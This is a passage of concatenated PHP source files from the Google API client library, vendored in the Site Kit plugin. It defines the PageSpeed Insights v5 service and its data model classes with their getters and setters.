'v2/{+parent}/sites', 'httpMethod' => 'GET', 'parameters' => ['parent' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'pageSize' => ['location' => 'query', 'type' => 'integer'], 'pageToken' => ['location' => 'query', 'type' => 'string']]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for PagespeedInsights (v5). * * <p> * The PageSpeed Insights API lets you analyze the performance of your website * with a simple API. It offers tailored suggestions for how you can optimize * your site, and lets you easily integrate PageSpeed Insights analysis into * your development tools and workflow.</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/speed/docs/insights/v5/about" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class PagespeedInsights extends \Google\Site_Kit_Dependencies\Google\Service { /** Associate you with your personal info on Google. */ const OPENID = "openid"; public $pagespeedapi; public $rootUrlTemplate; /** * Constructs the internal representation of the PagespeedInsights service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://pagespeedonline.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://pagespeedonline.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v5'; $this->serviceName = 'pagespeedonline'; $this->pagespeedapi = new \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Resource\Pagespeedapi($this, $this->serviceName, 'pagespeedapi', ['methods' => ['runpagespeed' => ['path' => 'pagespeedonline/v5/runPagespeed', 'httpMethod' => 'GET', 'parameters' => ['url' => ['location' => 'query', 'type' => 'string', 'required' => \true], 'captchaToken' => ['location' => 'query', 'type' => 'string'], 'category' => ['location' => 'query', 'type' => 'string', 'repeated' => \true], 'locale' => ['location' => 'query', 'type' => 'string'], 'strategy' => ['location' => 'query', 'type' => 'string'], 'utm_campaign' => ['location' => 'query', 'type' => 'string'], 'utm_source' => ['location' => 'query', 'type' => 'string']]]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class AuditRefs extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'relevantAudits'; /** * @var string */ public $acronym; /** * @var string */ public $group; /** * @var string */ public $id; /** * @var string[] */ public $relevantAudits; public $weight; /** * @param string */ public function setAcronym($acronym) { $this->acronym = $acronym; } /** * @return string */ public function getAcronym() { return $this->acronym; } /** * @param string */ public function setGroup($group) { $this->group = $group; } /** * @return string */ public function getGroup() { return $this->group; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string[] */ public function setRelevantAudits($relevantAudits) { $this->relevantAudits = $relevantAudits; } /** * @return string[] */ public function getRelevantAudits() { return $this->relevantAudits; } public function setWeight($weight) { $this->weight = $weight; } public function getWeight() { return $this->weight; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\AuditRefs::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_AuditRefs'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class ConfigSettings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $channel; /** * @var string */ public $emulatedFormFactor; /** * @var string */ public $formFactor; /** * @var string */ public $locale; /** * @var array */ public $onlyCategories; /** * @param string */ public function setChannel($channel) { $this->channel = $channel; } /** * @return string */ public function getChannel() { return $this->channel; } /** * @param string */ public function setEmulatedFormFactor($emulatedFormFactor) { $this->emulatedFormFactor = $emulatedFormFactor; } /** * @return string */ public function getEmulatedFormFactor() { return $this->emulatedFormFactor; } /** * @param string */ public function setFormFactor($formFactor) { $this->formFactor = $formFactor; } /** * @return string */ public function getFormFactor() { return $this->formFactor; } /** * @param string */ public function setLocale($locale) { $this->locale = $locale; } /** * @return string */ public function getLocale() { return $this->locale; } /** * @param array */ public function setOnlyCategories($onlyCategories) { $this->onlyCategories = $onlyCategories; } /** * @return array */ public function getOnlyCategories() { return $this->onlyCategories; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\ConfigSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_ConfigSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class PagespeedApiPagespeedResponseV5 extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $analysisUTCTimestamp; /** * @var string */ public $captchaResult; /** * @var string */ public $id; /** * @var string */ public $kind; protected $lighthouseResultType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseResultV5::class; protected $lighthouseResultDataType = ''; protected $loadingExperienceType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiLoadingExperienceV5::class; protected $loadingExperienceDataType = ''; protected $originLoadingExperienceType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiLoadingExperienceV5::class; protected $originLoadingExperienceDataType = ''; protected $versionType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedVersion::class; protected $versionDataType = ''; /** * @param string */ public function setAnalysisUTCTimestamp($analysisUTCTimestamp) { $this->analysisUTCTimestamp = $analysisUTCTimestamp; } /** * @return string */ public function getAnalysisUTCTimestamp() { return $this->analysisUTCTimestamp; } /** * @param string */ public function setCaptchaResult($captchaResult) { $this->captchaResult = $captchaResult; } /** * @return string */ public function getCaptchaResult() { return $this->captchaResult; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param LighthouseResultV5 */ public function setLighthouseResult(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseResultV5 $lighthouseResult) { $this->lighthouseResult = $lighthouseResult; } /** * @return LighthouseResultV5 */ public function getLighthouseResult() { return $this->lighthouseResult; } /** * @param PagespeedApiLoadingExperienceV5 */ public function setLoadingExperience(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiLoadingExperienceV5 $loadingExperience) { $this->loadingExperience = $loadingExperience; } /** * @return PagespeedApiLoadingExperienceV5 */ public function getLoadingExperience() { return $this->loadingExperience; } /** * @param PagespeedApiLoadingExperienceV5 */ public function setOriginLoadingExperience(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiLoadingExperienceV5 $originLoadingExperience) { $this->originLoadingExperience = $originLoadingExperience; } /** * @return PagespeedApiLoadingExperienceV5 */ public function getOriginLoadingExperience() { return $this->originLoadingExperience; } /** * @param PagespeedVersion */ public function setVersion(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedVersion $version) { $this->version = $version; } /** * @return PagespeedVersion */ public function getVersion() { return $this->version; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedApiPagespeedResponseV5::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_PagespeedApiPagespeedResponseV5'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class LhrEntity extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'origins'; /** * @var string */ public $category; /** * @var string */ public $homepage; /** * @var bool */ public $isFirstParty; /** * @var bool */ public $isUnrecognized; /** * @var string */ public $name; /** * @var string[] */ public $origins; /** * @param string */ public function setCategory($category) { $this->category = $category; } /** * @return string */ public function getCategory() { return $this->category; } /** * @param string */ public function setHomepage($homepage) { $this->homepage = $homepage; } /** * @return string */ public function getHomepage() { return $this->homepage; } /** * @param bool */ public function setIsFirstParty($isFirstParty) { $this->isFirstParty = $isFirstParty; } /** * @return bool */ public function getIsFirstParty() { return $this->isFirstParty; } /** * @param bool */ public function setIsUnrecognized($isUnrecognized) { $this->isUnrecognized = $isUnrecognized; } /** * @return bool */ public function getIsUnrecognized() { return $this->isUnrecognized; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string[] */ public function setOrigins($origins) { $this->origins = $origins; } /** * @return string[] */ public function getOrigins() { return $this->origins; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LhrEntity::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_LhrEntity'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class I18n extends \Google\Site_Kit_Dependencies\Google\Model { protected $rendererFormattedStringsType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\RendererFormattedStrings::class; protected $rendererFormattedStringsDataType = ''; /** * @param RendererFormattedStrings */ public function setRendererFormattedStrings(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\RendererFormattedStrings $rendererFormattedStrings) { $this->rendererFormattedStrings = $rendererFormattedStrings; } /** * @return RendererFormattedStrings */ public function getRendererFormattedStrings() { return $this->rendererFormattedStrings; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\I18n::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_I18n'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class PagespeedVersion extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $major; /** * @var string */ public $minor; /** * @param string */ public function setMajor($major) { $this->major = $major; } /** * @return string */ public function getMajor() { return $this->major; } /** * @param string */ public function setMinor($minor) { $this->minor = $minor; } /** * @return string */ public function getMinor() { return $this->minor; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\PagespeedVersion::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_PagespeedVersion'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class CategoryGroupV5 extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $description; /** * @var string */ public $title; /** * @param string */ public function setDescription($description) { $this->description = $description; } /** * @return string */ public function getDescription() { return $this->description; } /** * @param string */ public function setTitle($title) { $this->title = $title; } /** * @return string */ public function getTitle() { return $this->title; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\CategoryGroupV5::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_CategoryGroupV5'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class Categories extends \Google\Site_Kit_Dependencies\Google\Model { protected $internal_gapi_mappings = ["bestPractices" => "best-practices"]; protected $accessibilityType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5::class; protected $accessibilityDataType = ''; protected $bestPracticesType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5::class; protected $bestPracticesDataType = ''; protected $performanceType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5::class; protected $performanceDataType = ''; protected $pwaType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5::class; protected $pwaDataType = ''; protected $seoType = \Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5::class; protected $seoDataType = ''; /** * @param LighthouseCategoryV5 */ public function setAccessibility(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5 $accessibility) { $this->accessibility = $accessibility; } /** * @return LighthouseCategoryV5 */ public function getAccessibility() { return $this->accessibility; } /** * @param LighthouseCategoryV5 */ public function setBestPractices(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5 $bestPractices) { $this->bestPractices = $bestPractices; } /** * @return LighthouseCategoryV5 */ public function getBestPractices() { return $this->bestPractices; } /** * @param LighthouseCategoryV5 */ public function setPerformance(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5 $performance) { $this->performance = $performance; } /** * @return LighthouseCategoryV5 */ public function getPerformance() { return $this->performance; } /** * @param LighthouseCategoryV5 */ public function setPwa(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5 $pwa) { $this->pwa = $pwa; } /** * @return LighthouseCategoryV5 */ public function getPwa() { return $this->pwa; } /** * @param LighthouseCategoryV5 */ public function setSeo(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\LighthouseCategoryV5 $seo) { $this->seo = $seo; } /** * @return LighthouseCategoryV5 */ public function getSeo() { return $this->seo; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights\Categories::class, 'Google\\Site_Kit_Dependencies\\Google_Service_PagespeedInsights_Categories'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\PagespeedInsights; class RendererFormattedStrings extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $auditGroupExpandTooltip; /** * @var string */ public $calculatorLink; /** * @var string */ public $crcInitialNavigation; /** * @var string */ public $crcLongestDurationLabel; /** * @var string */ public $dropdownCopyJSON; /** * @var string */ public $dropdownDarkTheme; /** * @var string */ public $dropdownPrintExpanded; /** * @var string */ public $dropdownPrintSummary; /** * @var string */ public $dropdownSaveGist; /** * @var string */ public $dropdownSaveHTML; /** * @var string */ public $dropdownSaveJSON; /** * @var string */ public $dropdownViewer; /** * @var string */ public $errorLabel; /** * @var string */ public $errorMissingAuditInfo; /** * @var string */ public $footerIssue; /** * @var string */ public $labDataTitle; /** * @var string */ public $lsPerformanceCategoryDescription; /** * @var string */ public $manualAuditsGroupTitle; /** * @var string */ public $notApplicableAuditsGroupTitle; /** * @var string */ public $opportunityResourceColumnLabel; /** * @var string */ public $opportunitySavingsColumnLabel; /** * @var string */ public $passedAuditsGroupTitle; /** * @var string */ public $runtimeDesktopEmulation; /** * @var string */ public $runtimeMobileEmulation; /** * @var string */ public $runtimeNoEmulation; /** * @var string */ public $runtimeSettingsAxeVersion; /** * @var string */ public $runtimeSettingsBenchmark; /** * @var string */ public $runtimeSettingsCPUThrottling; /** * @var string */ public $runtimeSettingsChannel; /** * @var string */ public $runtimeSettingsDevice; /** * @var string */ public $runtimeSettingsFetchTime; /** * @var string */ public $runtimeSettingsNetworkThrottling; /** * @var string */ public $runtimeSettingsTitle; /** * @var string */ public $runtimeSettingsUA; /** * @var string */ public $runtimeSettingsUANetwork; /** * @var string */ public $runtimeSettingsUrl; /** * @var string */ public $runtimeUnknown; /** * @var string */ public $scorescaleLabel; /** * @var string */ public $showRelevantAudits; /** * @var string */ public $snippetCollapseButtonLabel; /** * @var string */ public $snippetExpandButtonLabel; /** * @var string */ public $thirdPartyResourcesLabel; /** * @var string */ public $throttlingProvided; /** * @var string */ public $toplevelWarningsMessage; /** * @var string */ public $varianceDisclaimer; /** * @var string */ public $viewTreemapLabel; /** * @var string */ public $warningAuditsGroupTitle; /** * @var string */ public $warningHeader; /** * @param string */ public function setAuditGroupExpandTooltip($auditGroupExpandTooltip) { $this->auditGroupExpandTooltip = $auditGroupExpandTooltip; } /** * @return string */ public function getAuditGroupExpandTooltip() { return $this->auditGroupExpandTooltip; } /** * @param string */ public function setCalculatorLink($calculatorLink) { $this->calculatorLink = $calculatorLink; } /** * @return string */ public function getCalculatorLink() { return $this->calculatorLink; } /** * @param string */ public function setCrcInitialNavigation($crcInitialNavigation) { $this->crcInitialNavigation = $crcInitialNavigation; } /** * @return string */ public function getCrcInitialNavigation() { return $this->crcInitialNavigation; } /** * @param string */ public function setCrcLongestDurationLabel($crcLongestDurationLabel) { $this->crcLongestDurationLabel = $crcLongestDurationLabel; } /** * @return string */ public function getCrcLongestDurationLabel() { return $this->crcLongestDurationLabel; } /** * @param string */ public function setDropdownCopyJSON($dropdownCopyJSON) { $this->dropdownCopyJSON = $dropdownCopyJSON; } /** * @return string */ public function getDropdownCopyJSON() { return $this->dropdownCopyJSON; } /** * @param string */ public function setDropdownDarkTheme($dropdownDarkTheme) { $this->dropdownDarkTheme = $dropdownDarkTheme; } /** * @return string */ public function getDropdownDarkTheme() { return $this->dropdownDarkTheme; } /** * @param string */ public function setDropdownPrintExpanded($dropdownPrintExpanded) { $this->dropdownPrintExpanded = $dropdownPrintExpanded; } /** * @return string */ public function getDropdownPrintExpanded() { return $this->dropdownPrintExpanded; } /** * @param string */ public function setDropdownPrintSummary($dropdownPrintSummary) { $this->dropdownPrintSummary = $dropdownPrintSummary; } /** * @return string */ public function getDropdownPrintSummary() { return $this->dropdownPrintSummary; } /** * @param string */ public function setDropdownSaveGist($dropdownSaveGist) { $this->dropdownSaveGist = $dropdownSaveGist; } /** * @return string */ public function getDropdownSaveGist() { return $this->dropdownSaveGist; } /** * @param string */ public function setDropdownSaveHTML($dropdownSaveHTML) { $this->dropdownSaveHTML = $dropdownSaveHTML; } /** * @return string */ public function getDropdownSaveHTML() { return $this->dropdownSaveHTML; } /** * @param string */ public function setDropdownSaveJSON($dropdownSaveJSON) { $this->dropdownSaveJSON = $dropdownSaveJSON; } /** * @return string */ public function getDropdownSaveJSON() { return $this->dropdownSaveJSON; } /** * @param string */ public function setDropdownViewer($dropdownViewer) { $this->dropdownViewer = $dropdownViewer; } /** * @return string */ public function getDropdownViewer() { return $this->dropdownViewer; } /** * @param string */ public function setErrorLabel($errorLabel) { $this->errorLabel = $errorLabel; } /** * @return string */ public function getErrorLabel() { return $this->errorLabel; } /** * @param string */ public function setErrorMissingAuditInfo($errorMissingAuditInfo) { $this->errorMissingAuditInfo = $errorMissingAuditInfo; } /** * @return string */ public function getErrorMissingAuditInfo() { return $this->errorMissingAuditInfo; } /** * @param string */ public function setFooterIssue($footerIssue) { $this->footerIssue = $footerIssue; } /** * @return string */ public function getFooterIssue() { return $this->footerIssue; } /** * @param string */ public function setLabDataTitle($labDataTitle) { $this->labDataTitle = $labDataTitle; } /** * @return string */ public function getLabDataTitle() { return $this->labDataTitle; } /** * @param string */ public function setLsPerformanceCategoryDescription($lsPerformanceCategoryDescription) { $this->lsPerformanceCategoryDescription = $lsPerformanceCategoryDescription; } /** * @return string */ public function getLsPerformanceCategoryDescription() { return $this->lsPerformanceCategoryDescription; } /** * @param string */ public function setManualAuditsGroupTitle($manualAuditsGroupTitle) { $this->manualAuditsGroupTitle = $manualAuditsGroupTitle; } /** * @return string */ public function getManualAuditsGroupTitle() { return $this->manualAuditsGroupTitle; } /** * @param string */ public function setNotApplicableAuditsGroupTitle($notApplicableAuditsGroupTitle) { $this->notApplicableAuditsGroupTitle = $notApplicableAuditsGroupTitle; } /** * @return string */ public function getNotApplicableAuditsGroupTitle() { return $this->notApplicableAuditsGroupTitle; } /** * @param string */ public function setOpportunityResourceColumnLabel($opportunityResourceColumnLabel) { $this->opportunityResourceColumnLabel = $opportunityResourceColumnLabel; } /** * @return string */ public function getOpportunityResourceColumnLabel() { return $this->opportunityResourceColumnLabel; } /** * @param string */ public function setOpportunitySavingsColumnLabel($opportunitySavingsColumnLabel) { $this->opportunitySavingsColumnLabel = $opportunitySavingsColumnLabel; } /** * @return string */ public function getOpportunitySavingsColumnLabel() { return $this->opportunitySavingsColumnLabel; } /** * @param string */ public function setPassedAuditsGroupTitle($passedAuditsGroupTitle) { $this->passedAuditsGroupTitle = $passedAuditsGroupTitle; } /** * @return string */ public function getPassedAuditsGroupTitle() { return $this->passedAuditsGroupTitle; } /** * @param string */ public function setRuntimeDesktopEmulation($runtimeDesktopEmulation) { $this->runtimeDesktopEmulation = $runtimeDesktopEmulation; } /** * @return string */ public function getRuntimeDesktopEmulation() { return $this->runtimeDesktopEmulation; } /** * @param string */ public function setRuntimeMobileEmulation($runtimeMobileEmulation) { $this->runtimeMobileEmulation = $runtimeMobileEmulation; } /** * @return string */ public function getRuntimeMobileEmulation() { return $this->runtimeMobileEmulation; } /** * @param string */ public function setRuntimeNoEmulation($runtimeNoEmulation) { $this->runtimeNoEmulation = $runtimeNoEmulation; } /** * @return string */ public function getRuntimeNoEmulation() { return $this->runtimeNoEmulation; } /** * @param string */ public function setRuntimeSettingsAxeVersion($runtimeSettingsAxeVersion) { $this->runtimeSettingsAxeVersion = $runtimeSettingsAxeVersion; } /** * @return string */ public function getRuntimeSettingsAxeVersion() { return $this->runtimeSettingsAxeVersion; } /** * @param string */ public function setRuntimeSettingsBenchmark($runtimeSettingsBenchmark) { $this->runtimeSettingsBenchmark = $runtimeSettingsBenchmark; } /** * @return string */ public function getRuntimeSettingsBenchmark() { return $this->runtimeSettingsBenchmark; } /** * @param string */ public function setRuntimeSettingsCPUThrottling($runtimeSettingsCPUThrottling) { $this->runtimeSettingsCPUThrottling = $runtimeSettingsCPUThrottling; } /** * @return string */ public function getRuntimeSettingsCPUThrottling() { return $this->runtimeSettingsCPUThrottling; } /** * @param string */ public function setRuntimeSettingsChannel($runtimeSettingsChannel) { $this->runtimeSettingsChannel = $runtimeSettingsChannel; } /** * @return string */ public function getRuntimeSettingsChannel() { return $this->runtimeSettingsChannel; } /** * @param string */ public function setRuntimeSettingsDevice($runtimeSettingsDevice) { $this->runtimeSettingsDevice = $runtimeSettingsDevice; } /** * @return string */ public function getRuntimeSettingsDevice() { return $this->runtimeSettingsDevice; } /** * @param string */ public function setRuntimeSettingsFetchTime($runtimeSettingsFetchTime) { $this->runtimeSettingsFetchTime = $runtimeSettingsFetchTime; } /** * @return string */ public function getRuntimeSettingsFetchTime() { return $this->runtimeSettingsFetchTime; } /** * @param string */ public function setRuntimeSettingsNetworkThrottling($runtimeSettingsNetworkThrottling) { $this->runtimeSettingsNetworkThrottling = $runtimeSettingsNetworkThrottling; } /** * @return string */ public function getRuntimeSettingsNetworkThrottling() { return $this->runtimeSettingsNetworkThrottling; } /** * @param string */ public function setRuntimeSettingsTitle($runtimeSettingsTitle) { $this->runtimeSettingsTitle = $runtimeSettingsTitle; } /** * @return string */ public function getRuntimeSettingsTitle() { return $this->runtimeSettingsTitle; } /** * @param string */ public function setRuntimeSettingsUA($runtimeSettingsUA) { $this->runtimeSettingsUA = $runtimeSettingsUA; } /** * @return string */ public function getRuntimeSettingsUA() { return $this->runtimeSettingsUA; } /** * @param string */ public function setRuntimeSettingsUANetwork($runtimeSettingsUANetwork) { $this->runtimeSettingsUANetwork = $runtimeSettingsUANetwork; } /** * @return string */ public function getRuntimeSettingsUANetwork() { return $this->runtimeSettingsUANetwork; } /** * @param string */ public function setRuntimeSettingsUrl($runtimeSettingsUrl) { $this->runtimeSettingsUrl = $runtimeSettingsUrl; } /** * @return string */ public function getRuntimeSettingsUrl() { return $this->runtimeSettingsUrl; } /** * @param string */ public function setRuntimeUnknown($runtimeUnknown) { $this->runtimeUnknown = $runtimeUnknown; } /** * @return string */ public function getRuntimeUnknown() { return $this->runtimeUnknown; } /** * @param string */ public function setScorescaleLabel($scorescaleLabel) { $this->scorescaleLabel = $scorescaleLabel; } /** * @return string */ public function getScorescaleLabel() { return $this->scorescaleLabel; } /** * @param string */ public function setShowRelevantAudits($showRelevantAudits) { $this->showRelevantAudits = $showRelevantAudits; } /** * @return string */ public function getShowRelevantAudits() { return $this->showRelevantAudits; } /** * @param string */ public function setSnippetCollapseButtonLabel($snippetCollapseButtonLabel) { $this->snippetCollapseButtonLabel = $snippetCollapseButtonLabel; } /** * @return string */ public function getSnippetCollapseButtonLabel() { return $this->snippetCollapseButtonLabel; } /** * @param string */ public function setSnippetExpandButtonLabel($snippetExpandButtonLabel) { $this->snippetExpandButtonLabel = $snippetExpandButtonLabel; } /** * @return string */ public function getSnippetExpandButtonLabel() { return $this->snippetExpandButtonLabel; } /** * @param string */ public function setThirdPartyResourcesLabel($thirdPartyResourcesLabel) { $this->thirdPartyResourcesLabel = $thirdPartyResourcesLabel; } /** * @return string */ public function getThirdPartyResourcesLabel() { return $this->thirdPartyResourcesLabel; } /** * @param string */ public function setThrottlingProvided($throttlingProvided) { $this->throttlingProvided = $throttlingProvided; } /** * @return string */ public function getThrottlingProvided() { return $this->throttlingProvided; } /** * @param string */ public function setToplevelWarningsMessage($toplevelWarningsMessage) { $this->toplevelWarningsMessage = $toplevelWarningsMessage; } /** * @return string */ public function getToplevelWarningsMessage() { return $this->toplevelWarningsMessage; } /** * @param string */ public function setVarianceDisclaimer($varianceDisclaimer) { $this->varianceDisclaimer = $varianceDisclaimer; } /** * @return string */ public function getVarianceDisclaimer() { return $this->varianceDisclaimer; } /** * @param string */ public function setViewTreemapLabel($viewTreemapLabel) { $this->viewTreemapLabel = $viewTreemapLabel; } /** * @return string */ public function getViewTreemapLabel() { return $this->viewTreemapLabel; } /** * @param string */ public function setWarningAuditsGroupTitle($warningAuditsGroupTitle) { $this->warningAuditsGroupTitle = $warningAuditsGroupTitle; } /** * @return string */ public function getWarningAuditsGroupTitle() { return $this->warningAuditsGroupTitle; } /** * @param string */ public function setWarningHeader($warningHeader) { $this->warningHeader = $warningHeader; } /** * @return string */ public function getWarningHeader() { return $this->warningHeader; } } // Adding a class alias for backwards compatibility with the previous class name. 